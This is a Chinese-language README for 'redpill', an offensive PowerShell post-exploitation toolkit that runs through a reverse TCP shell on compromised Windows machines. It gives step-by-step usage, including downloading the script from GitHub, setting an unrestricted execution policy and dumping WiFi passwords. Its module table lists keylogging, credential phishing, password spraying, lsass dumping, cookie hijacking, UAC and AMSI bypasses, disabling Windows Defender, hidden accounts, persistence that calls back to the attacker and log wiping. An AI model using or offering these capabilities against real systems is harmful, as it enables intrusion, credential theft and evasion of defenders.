
redpill 项目旨在协助反向 TCP Shell 执行后渗透任务。在红队任务中,我们常常
需要使用非常规方式访问目标系统,例如反向 TCP Shell(非 Metasploit),以便
绕过系统管理员部署的防御措施。在成功完成第一步之后,
我们面临另一种问题:“我已经获得目标系统的(Shell)访问权限,现在能做什么?”
该项目包含多个 PowerShell 脚本,用于执行不同的后渗透任务,
主脚本redpill.ps1的主要功能是下载/配置/执行本仓库中的脚本。
目标是让我们的反向 TCP Shell 提示符具有类似 meterpreter 的体验(类似 meterpreter 的选项)。
该 cmdlet 属于 venom v1.0.17.8 的后渗透模块结构。
venom 的 AMSI 规避代理会自动将此 cmdlet 上传到 %TMP% 目录,以便
在我们的反向 TCP Shell(Shell 提示符)中轻松访问。
列出所有可用参数,请在 PowerShell 提示符中执行:
.\redpill.ps1 -Help Parameters
该 cmdlet 属于 venom v1.0.17.8 的后渗透模块结构。
venom 的 AMSI 规避代理会自动将此 cmdlet 上传到 %TMP% 目录,以便
在我们的反向 TCP Shell(Shell 提示符)中轻松访问。
'此部分介绍如何在不攻击目标主机的情况下本地测试该 CmdLet'
1º - 从 GitHub 仓库下载 CmdLet 到“本地磁盘”
iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1|Unblock-File
2º - 将 PowerShell 执行策略设置为“不受限制”
Set-ExecutionPolicy UnRestricted -Scope CurrentUser

3º - 浏览到“redpill.ps1”的存储目录
cd C:\Users\pedro\Desktop

4º - 访问 CmdLet 帮助菜单 {所有参数}
.\redpill.ps1 -Help Parameters

5º - 访问[ -WifiPasswords ]的详细参数帮助
该 cmdlet 属于 venom v1.0.17.8 的后渗透模块结构。
venom 的 AMSI 规避代理会自动将此 cmdlet 上传到 %TMP% 目录,以便
在我们的反向 TCP Shell(Shell 提示符)中轻松访问。
1º - 在反向 TCP Shell 提示符中执行
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help Parameters

2º - 访问[ -WifiPasswords ]的详细参数帮助
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -Help WifiPasswords

3º - 运行[ -WifiPasswords ] [ Dump ]模块
[SKYNET] C:\Users\pedro\AppData\Local\Temp> powershell -File redpill.ps1 -WifiPasswords Dump

iwr -Uri https://raw.githubusercontent.com/r00t-3xp10it/redpill/main/redpill.ps1 -OutFile redpill.ps1|Unblock-File

演示 - 本教程使用:sysinfo, GetPasswords, UacMe 模块
MouseLogger - 借助 psr.exe 捕获“鼠标点击”的屏幕截图
PhishCreds - 钓鱼获取登录凭据或暴力破解用户账户密码
FileMace - 更改文件时间戳 {创建时间, 最后访问时间, 最后写入时间}
CsOnTheFly - 即时从 URL 下载、自动编译并执行 C# 脚本!
EOP - 查找缺失的软件补丁以进行权限提升






| CmdLet 参数名称 | 参数参数 | 描述 |
|---|
| -SysInfo | Enum | Verbose | 快速系统信息或详细枚举 |
| -GetConnections | Enum | Verbose | 枚举远程主机的活动 TCP 连接 |
| -GetDnsCache | Enum | Clear | 枚举/清除远程主机的 DNS 缓存条目 |
| -GetInstalled | Enum | 枚举远程主机上已安装的应用程序 |
| -GetProcess | Enum | Kill | Tokens | 枚举或终止远程主机正在运行的进程 |
| -GetTasks | Enum | Create | Delete | 枚举/创建/删除远程主机上正在运行的任务 |
| -GetLogs | Enum | Verbose | Clear | 枚举事件查看器日志或清除所有事件日志 |
| -LiveStream | Bind | Reverse | Stop | Nishang 脚本,使用 MJPEG 流式传输目标桌面 |
| -GetBrowsers | Enum | Verbose | Creds | 枚举已安装的浏览器及其版本,或详细输出 |
| -GetSkype | Contacts|DomainUsers | 枚举并攻击联合 Skype |
| -Screenshot | 1 | 捕获 1 张桌面截图并保存到 %TMP% |
| -Camera | Enum | Snap | 枚举计算机摄像头或捕获默认摄像头快照 |
| -StartWebServer | Python | Powershell | 下载 Web 服务器到 %TMP% 并执行 |
| -Keylogger | Start | Stop | 开始或停止录制远程主机的键盘输入 |
| -MouseLogger | Start | 捕获鼠标点击的屏幕截图,持续 10 秒 |
| -PhishCreds | Start | Brute | 提示当前用户输入有效凭据并泄露捕获信息 |
| -GetPasswords | Enum | Dump | 枚举不同位置(存储/注册表/磁盘)的密码 |
| -PasswordSpray | Spray | 对 Active Directory 中的账户进行密码喷洒攻击! |
| -WifiPasswords | Dump | ZipDump | 枚举可用 SSID 或压缩导出所有 WiFi 密码 |
| -EOP | Enum | Verbose | 查找缺失的软件补丁以进行权限提升 |
| -ADS | Enum | Create | Exec | Clear | 在 $DATA 记录(ADS)中隐藏脚本 {bat | ps1 | exe} |
| -BruteZip | $Env:TMP\archive.zip | 借助 7z.exe 暴力破解选定的 ZIP 归档文件 |
| -Upload | script.ps1 | 从攻击者的 Apache2 Web 根目录上传 script.ps1 |
| -Persiste | $Env:TMP\Script.ps1 | 使 script.ps1 每次启动时持久化运行(回连主控) |
| -CleanTracks | Clear | Paranoid | 清除磁盘上遗留的痕迹(清理系统痕迹) |
| -AppLocker | Enum | WhoAmi | TestBat | 枚举权限较弱的 AppLocker 目录 |
| -FileMace | $Env:TMP\test.txt | 更改文件的 Mace 属性(创建时间、最后访问时间、最后写入时间) |
| -MetaData | $Env:TMP\test.exe | 显示文件或应用程序的描述(元数据) |
| -psgetsys | Enum | Auto | Impersonate | 在不同的父进程下生成进程! |
| -MsgBox | "Hello World." | 在本地主机上弹出 "Hello World." 消息框(wscriptComObject) |
| -SpeakPrank | "Hello World." | 让远程主机朗读用户输入的句子(恶作剧) |
| -NetTrace | Enum | 借助 netsh(原生)进行激进枚举 |
| -PingSweep | Enum | Verbose | 枚举局域网内的活动 IP 地址和开放端口 |
| -DnsSpoof | Enum | Redirect | Clear | 将域名重定向到我们的钓鱼 IP 地址 |
| -DisableAV | Query | Start | Stop | 禁用 Windows Defender 服务(WinDefend) |
| -HiddenUser | Query | Create | Delete | 查询/创建/删除隐藏用户账户 |
| -CsOnTheFly | Compile | Execute | 下载、编译(为 exe)并执行 C# 脚本 |
| -CookieHijack | Dump|History | Edge/Chrome Cookie 劫持工具 |
| -UacMe | Bypass | Elevate | Clean | 通过 DLL 反射实现 UAC 绕过/权限提升(cmstp.exe) |
| -GetAdmin | check | exec | 将会话从普通用户提升到管理员! |
| -NoAmsi | List | TestAll | Bypass | 测试 AMSI 绕过或简单执行一个绕过方法 |
| -Clipboard | Enum | Capture | Prank | 捕获剪贴板中的文本/文件/图片/音频内容! |
| -GetCounterMeasures | Enum | verbose | 列出正在运行的常见安全进程/PID! |
| -DumpLsass | lsass| all | 从 lsass/sam/system/security 进程/注册表配置单元中导出数据 |
要显示每个参数的详细信息,请执行:
语法 : .\redpill.ps1 -Help [参数名称]
示例: .\redpill.ps1 -Help WifiPasswords

语法 : .\redpill.ps1 -Help [参数名称]
示例: .\redpill.ps1 -Help WifiPasswords

6º - 运行[ -WifiPasswords ] [ Dump ]模块
语法 : .\redpill.ps1 [参数名称] [ @参数 ]
示例: .\redpill.ps1 -WifiPasswords Dump

7º - 运行[ -sysinfo ] [ Enum ]模块
语法 : .\redpill.ps1 [参数名称] [ @参数 ]
示例: .\redpill.ps1 -sysinfo Enum

| hax0r | 功能 | 操作系统版本 |
|---|
| @youhacker55 | 感谢帮助调试此 cmdlet(测试 BETA 版本) | Windows 7 x64bits |
| @0xyg3n | 感谢帮助调试此 cmdlet(测试 BETA 版本) | Windows 10 x64bits |
| @Shanty_Damayanti | 调试此 cmdlet(amsi 字符串检测绕过) | Windows 10 x64bits |
| @miltinhoc | 调试此 cmdlet 并录制视频教程 | Windows 10 x64bits |